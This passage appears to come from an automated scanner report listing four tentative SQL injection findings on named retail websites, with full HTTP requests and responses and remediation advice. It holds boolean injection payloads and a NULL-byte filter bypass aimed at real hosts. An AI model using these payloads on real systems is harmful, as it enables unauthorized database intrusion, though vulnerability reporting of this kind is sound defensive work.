28.16. https://www.redcrossstore.org/

28.17. https://www.restorationhardware.com/

28.18. https://www.toshibadirect.com/



1. SQL injection  next
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://img.bluenile.com/is/image/bluenile/txttemp_hdr_h5 [$layer_2_text_4 parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://img.bluenile.com
Path:   /is/image/bluenile/txttemp_hdr_h5

Issue detail

The $layer_2_text_4 parameter appears to be vulnerable to SQL injection attacks. The payloads 15710605'%20or%201%3d1--%20 and 15710605'%20or%201%3d2--%20 were each submitted in the $layer_2_text_4 parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /is/image/bluenile/txttemp_hdr_h5?$txt_h4$&layer=comp&=1,1&size=170,45&wid=170&hei=45&=0,0&=0,0\tb&$layer_2_text_0=R&$layer_2_text_1=ECENTLY&$layer_2_text_2=P&$layer_2_text_3=URCHASED&$layer_2_text_4=E15710605'%20or%201%3d1--%20&$layer_2_text_5=NGAGEMENT&$layer_2_text_6=R&$layer_2_text_7=INGS\te HTTP/1.1
Host: img.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; testcookie=

Response 1

HTTP/1.1 200 OK
Content-Length: 3264
Content-Type: image/gif
ETag: "68a098526d9c663ce408d5bf0d8d4097"
Expires: Thu, 30 Jun 2011 02:11:23 GMT
Server: Apache-Coyote/1.1
Date: Mon, 16 May 2011 02:10:18 GMT
Connection: keep-alive

GIF89a..-...........">...Yj}v........\m.......D\...BVk................0J.........6KbTfz:Ne.... <l|.............2G_Zj~......K^r...}..t..dt........*F...............<Pg.............$@....,G...]m.......~..$;T............"8R...Rdx......'>W...Pbvr..kz....................(D
#@......4Ia...q..z...4N@Tj5Ja.........9Ne...o~........%A..................fv.br.DWl........<...Xi|..97Lc.5P.,H.....6.........FYn.........hx.I\q..;............=Qh...3H``p...I...8Ldx...........jz.J\r...... 7Q...|..~..#:T......;OfN`t%<U[l......s.....................%Bp....Vh{...PbuWh|H[pOavObv......^n.CVl)@X+B[.(D..<?Ri....2MTey,BZ.........*@Y
#?=Rh#;S%<Var.............GZp...&=V.-I(?W...z.. 8Qiy.M_t......_p....0E^...2H_.C\0F^./Jl{.r..)?X......m}.ct.........................Vg{.'C+AZ...n}..1L.......(C....3M_o.!.......,......-........H......*\......#J.H.....3B. ...*..*....".........O....3...%..... =...
.PJ..[.....d.@..T.(aB.(....Q.5@..z..a1F.6E...4!...2..T.......n.,......x..$........,..!D...h.....K-A( ...K.Vp
@..#I&.Xb.
.m.8y.U ..Q.y.....46.&......'..+0... .l~.....+=..)......\.9.`)a......)i.Z...a..&1Y..l.b`..e...@f...    ..$.@P...s..!.@..0.@.T'.$.d..&.....].......AO.'P......@LW..s\X...    ....i(.$H...r..Q..L.&..............3..V.2.@h.`\;.R..}XR. k.t...$.
(...D..}..!.@.$..4.D........0B..m..........QAu.......qB!..QP..(P.'>t.    ..0........%...I.j....X...@...G....@......J.q.N.......P..(.....8.!E .....!......IY........../@...............,....l...'....7...'..5.T.
...;P... ....L...    QP...X.*.8....`,P....I=.Y..D;3<..sp...X    d.9=......R46%."5#.<........_T;... ..@S.B...P    @..4...N.A.E.h!.D. A...+.B.&O.A......@..AP6#....X.....T.h2..T....1...u..F5xp.A..Q......@...W.+$x.3.$..."....i..@8.../..rIA........FFe.C.;.d.}...=....`.Lm....'%t.....53;..
2....4......E..S.!.AT.    .....x...a. ..p....../.h.~....p.XLCL...AX..... ..F....%pN W...
...X..X...8%.[T"yx.....b...... A.......t...."....o...C:.r>.p..Q(H..Q.2.a .h.@.P.....AI...A    ;xL .8.@.aG.\.........:$....^3...F6.{.h...&.... .X@Ata....k.X.@:...0c.......6.|.....~...#......!.B.s.D....0.....n U$H.D .-...z.W%..K. . 'h.A&1.s......X0 ..A
...6R.......Q.. (.s......d"...4..z.If. `.+.%..iEh.P.=t..q H%8`.u`g ..M.d./v..'#.F..`.H...(......
...[SNIP]...

Request 2

GET /is/image/bluenile/txttemp_hdr_h5?$txt_h4$&layer=comp&=1,1&size=170,45&wid=170&hei=45&=0,0&=0,0\tb&$layer_2_text_0=R&$layer_2_text_1=ECENTLY&$layer_2_text_2=P&$layer_2_text_3=URCHASED&$layer_2_text_4=E15710605'%20or%201%3d2--%20&$layer_2_text_5=NGAGEMENT&$layer_2_text_6=R&$layer_2_text_7=INGS\te HTTP/1.1
Host: img.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; bnper=NIB~0&CONTEXT-NAME~53&ver~3&CURR~USD&CURR_SYM~%24; bnses=new~true&ver~1; stc=3NZR3Q; testcookie=

Response 2

HTTP/1.1 200 OK
Content-Length: 3283
Content-Type: image/gif
ETag: "6cd3f5060d003d4a8b293ab0f32fb5b0"
Expires: Thu, 30 Jun 2011 02:11:42 GMT
Server: Apache-Coyote/1.1
Date: Mon, 16 May 2011 02:10:19 GMT
Connection: keep-alive

GIF89a..-...........!>...Yj}Tey......\m.......D\...BVk................0J.........6Kb~..:Ne.... <l|.............2G_Zj~......K^r...}..t..dt........*F......o~.......<Pg.............$@v...,G...]m.......~..$;T............"8R...Rdx......'>W...Pbvr..kz....................(D
#@......4IaJ\rq..z....9@Tj5Ja.........9Ne....4N.......%A..................fv.br.DWl........<...Xi|.5P7LcFYn.,H.....6`p...................hx.I\q..;............=Qh...3H`x....I...8Ld............jz.......... 7Q...|..Vh{#:T.........;OfN`t%<U[l......s.....................%Bp....H[p(>WPbuWh|^n.OavObv......CVl)@X 8Q+B[..._o...<?Ri....2M,BZ.........*@YL_s=Rh#;S%<Var.......H[o......GZp...p.&=V.-I...z..iy.M_t........._p.......0E^...2H_.C\0F^..../Jl{.r..)?X......m}.ct.......n}.................'C+AZ....1L.......(C.3M!.......,......-........H......*\......#J.H.....3B. ...*..*....&.........O...X3...%.....`....
.`..    \.......@..V.(aB )..q.Q.5@..z..a1F 7E...4!...2..T......6n........x..$........,..!D...h.....M-A( ...K.Vp
@..#I&.Xr.
.m.8y.U ..Q.y.....46.&......'..+p... .l~.....+=..)......\.9..........)i.Z...a..&1Y..l.b`..e...@f...    ..$.@....s..!.@..0.@.T'.$...B$.....].......AO.'P...q..@LW.<.\X...    ....i(.$H...r..Q..L.&..............3...2.@h.`\<....}dQ....t...$.J(...D..}..".@.$....D........0B..q..........QAu........E!Y.QP..(`.'>t.    ..0........%...    .j....X...@...G....@......J.q.N.l.....g..(.....D.!E Xa...!......IY..........V`...............,....l...'....7....'.
6.T.
..    BP... ....L...    Q....X.*.8....`,P....    >.Y.BD.x s.Sh1.W*|..@6..3SK......p.....d...tD
|..@.l..,.M.K1..B%.......8...q.E9..r....x..
..d..qPa.@..5P<j......"........."....C.1n.D..rt.i.....2.=.G....*..R.(.).B..Es...y./B..@.+......)".(......hY.AodTF>........=...d.4....Lm........"...J..5..@5.%... H;.@..Lc.O1H)..
O0..~...
`. .Aq....../.h.h
......\XCL...AZ..... . ......    d    ...........Y...V...N    ...x....6..a.6..2H..X...3 E.
..]H...(B..0.?.. .3.7........yA.....<.......q,....\..@.p...#...D(.....a.tH..z.=g....t...2.../!*4.&.P.]X .6.@=V$..0..|..@8..}.M ..GA........!#7..I..`....*...8.......z....@K..f!.....S J;.    .@.IL.\...@......R../f....#..Y...0(.u. ..`$%...4H.{...".....a-. .+B.....C,..A*....#{...n. .xY..8..1Z..
...[SNIP]...

1.2. http://metrics.brookstone.com/b/ss/bstoneprod/1/H.21/s08547089211642 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.brookstone.com
Path:   /b/ss/bstoneprod/1/H.21/s08547089211642

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/bstoneprod/1/H.21/s08547089211642?AQB=1&ndh=1&t=15/4/2011%2020%3A58%3A47%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=outdoor%20living%3Ahome&g=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DworldLandingPage_outdoor_living%7CCXTopNav1FDT%7Coutdoor_living&r=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living&cc=USD&c1=outdoor%20living&h1=outdoor%20living%3Ahome&v2=worldlandingpage_outdoor_living%7Ccxtopnav1fdt%7Coutdoor_living&v3=outdoor%20living%3Ahome&c4=world%20page&v4=internal%20campaign&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acat_2%5E%5E%28%27111105%27%29&c20=834&c21=111105&c25=results&v28=navigation&v32=SEARCH%2BNAV&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=homepage&pidt=1&oid=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living_1&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_sess=%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B%20s_cc%3Dtrue%3B%20s_evar2%3DworldLandingPage_outdoor_living%257CCXTopNav1FDT%257Coutdoor_living%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512928647%3B

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 02:16:23 GMT
Server: Omniture DC/2.0.0
Content-Length: 404
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/bstoneprod/1/H.21/s08547089211642?AQB=1&ndh=1&t=15/4/2011%2020%3A58%3A47%200%20300&vmt=4B69B3F8&ns=brookstone&pageName=outdoor%20living%3Ahome&g=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DworldLandingPage_outdoor_living%7CCXTopNav1FDT%7Coutdoor_living&r=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living&cc=USD&c1=outdoor%20living&h1=outdoor%20living%3Ahome&v2=worldlandingpage_outdoor_living%7Ccxtopnav1fdt%7Coutdoor_living&v3=outdoor%20living%3Ahome&c4=world%20page&v4=internal%20campaign&c13=E%3AStore_ID%5E%5E%28%272%27%29&c14=T%3Acat_2%5E%5E%28%27111105%27%29&c20=834&c21=111105&c25=results&v28=navigation&v32=SEARCH%2BNAV&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1136&bh=902&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=homepage&pidt=1&oid=http%3A//www.brookstone.com/outdoor-living.html%3Fbkiid%3DhomePage%7CCXTopNav1FDT%7Coutdoor_living_1&oidt=1&ot=A&oi=1&AQE=1 HTTP/1.1
Host: metrics.brookstone.com
Proxy-Connection: keep-alive
Referer: http://www.brookstone.com/outdoor-living.html?bkiid=worldLandingPage_outdoor_living|CXTopNav1FDT|outdoor_living
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; s_sess=%20s_sq%3Dbstoneprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/outdoor-living.html%2525253Fbkiid%2525253DhomePage%2525257CCXTopNav1FDT%2525257Coutdoor_living_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B%20s_cc%3Dtrue%3B%20s_evar2%3DworldLandingPage_outdoor_living%257CCXTopNav1FDT%257Coutdoor_living%3B; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305512928647%3B

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 02:16:23 GMT
Server: Omniture DC/2.0.0
xserver: www373
Content-Length: 0
Content-Type: text/html


1.3. http://metrics.gnc.com/b/ss/gsicgncf/1/H.20.3/s37654085024105 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.gnc.com
Path:   /b/ss/gsicgncf/1/H.20.3/s37654085024105

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/gsicgncf/1/H.20.3/s37654085024105?AQB=1&ndh=1&t=16/4/2011%205%3A55%3A7%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp&r=http%3A//burp/show/10&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=External%20Source&c4=www.google.com&c5=New&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&v27=My%20Account%3A%20Sign-In&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543307026%7C1308135307026%3B%20gpv_p6%3DHome%2520Page%7C1305545107027%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:08:38 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/gsicgncf/1/H.20.3/s37654085024105?AQB=1&ndh=1&t=16/4/2011%205%3A55%3A7%201%20300&vmt=2932E0&pageName=Home%20Page&g=http%3A//www.gnc.com/home/index.jsp&r=http%3A//burp/show/10&ch=Home%20Page&server=www.gnc.com&c1=Home%20Page&c2=Home%20Page&c3=External%20Source&c4=www.google.com&c5=New&c7=Home%20Page&c12=Home%20Page&v22=New&v24=6%3A30AM&v25=Monday&v26=Weekday&v27=My%20Account%3A%20Sign-In&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1137&bh=805&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: metrics.gnc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
Cookie: mt.v=1.1133488502.1305543174179; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; s_pers=%20s_lastvisit%3D1305543175233%7C1400151175233%3B%20s_nr%3D1305543307026%7C1308135307026%3B%20gpv_p6%3DHome%2520Page%7C1305545107027%3B; PrefID=32-982599681; s_vi=[CS]v1|26E881040514A1E8-60000163401B15C0[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 16 May 2011 11:08:38 GMT
Server: Omniture DC/2.0.0
xserver: www408
Content-Length: 0
Content-Type: text/html


1.4. http://www.homedepot.ca/webapp/wcs/stores/servlet/Home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.ca
Path:   /webapp/wcs/stores/servlet/Home

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:54:35 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Thu, 13 May 2021 01:54:34 GMT
Content-Length: 94929


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/77994b3d-1a90-4ea2-b07a-33fdd6110c32_2.jpg" alt="Fasara&amp;#153; Interior Design Window Film - Rice Paper" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">3M&#153;</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Fasara&#153; Interior Design Window Film - Rice Paper</a>
</p>
<p class="price-container">
<span class="price"><span class="old-price">$34.95</span><span class="new-price">$29.99</span></span><span class="promos"><img class="lower-price" src="/wcsstore/HomeDepotCanada/images/global/icons/en/lower-price.gif" width="30" height="30"></span>
</p>
</div>
<div class="prod">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/15886.RectangleDeckLt19152_011_2.jpg" alt="Solar LED Rectangle Deck Light - 2 Pack" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Hampton Bay</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Solar LED Rectangle Deck Light - 2 Pack
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.homedepot.ca
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.1.10.1305510002; jsEnabled=1; RES_TRACKINGID=989860238041728; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; s_v14=English; s_sq=%5B%5BB%5D%5D; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; fsr.s={"v":1,"rid":"1305510029454_909320","to":3,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-CA
Date: Mon, 16 May 2011 01:54:35 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Expires: Thu, 13 May 2021 01:54:35 GMT
Content-Length: 95035


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/15886.RectangleDeckLt19152_011_2.jpg" alt="Solar LED Rectangle Deck Light - 2 Pack" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Hampton Bay</a>
</p>
<p class="prod-desc">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=916387&Ntt=916387&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">Solar LED Rectangle Deck Light - 2 Pack</a>
</p>
<p class="price-container">
<span class="price"><span class="old-price">$39.99</span><span class="new-price">$34.99</span></span><span class="promos"><img class="lower-price" src="/wcsstore/HomeDepotCanada/images/global/icons/en/lower-price.gif" width="30" height="30"></span>
</p>
</div>
<div class="prod">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber"><img src="/wcsstore/HomeDepotCanada/images/catalog/77994b3d-1a90-4ea2-b07a-33fdd6110c32_2.jpg" alt="Fasara&amp;#153; Interior Design Window Film - Rice Paper" width="100" height="100"></a>
<p class="prod-title">
<a href="/webapp/wcs/stores/servlet/CatalogSearchResultView?D=931982&Ntt=931982&catalogId=10051&langId=-15&storeId=10051&Dx=mode+matchallpartial&Ntx=mode+matchall&N=0&Ntk=P_PartNumber">3M&#153;</a>
</p>
<p class="prod-desc">
